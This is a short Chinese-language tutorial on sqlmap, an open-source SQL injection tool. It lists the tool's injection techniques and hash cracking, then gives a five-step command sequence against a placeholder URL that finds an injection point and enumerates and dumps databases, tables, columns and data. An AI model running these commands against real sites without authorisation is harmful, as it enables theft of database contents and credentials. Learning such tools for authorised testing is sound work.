Sqlmap是一个自动检测和利用SQL注入漏洞的免费开源工具
1、支持对多种数据的库进行注入测试,能够自动识别数据库类型并注入
2、支持多种注入技术,并且能够自动探测使用合适的注入技术,如:布尔盲注、时间盲注、联合查询注入、报错注入、堆查询注入
3、能够爆破数据库信息,如用户名、密码
4、能够自动识别哈希密码,并且使用密码字典进行破解
Sqlmap注入流程:
一、判断是否存在注入点
sqlmap -u url(目标地址)
二、查询数据库信息
sqlmap -u http://xxx.com/?id=1 --dbs
--dbs:查看所有数据库名
--current-db:查看当前使用的数据库
三、根据数据库爆破数据表
sqlmap -u http://xxx.com/?id=1 -D 库名 --tables
-D:指定数据库名
--tables:查看指定库下面的所有表名
四、根据数据库名和数据库表名爆破字段名
sqlmap -u http://xxx.com/?id=1 -D 库名 -T 表名 --columns
-T:指定表名
--columns:查看指定库的表中的所有字段名
五、爆破字段里面的数据
sqlmap -u http://xxx.com/?id=1 -D 库名 -T 表名 -C 字段名 --dump
-C:指定字段名
--dump:根据指定库、表、字段爆破里面的数据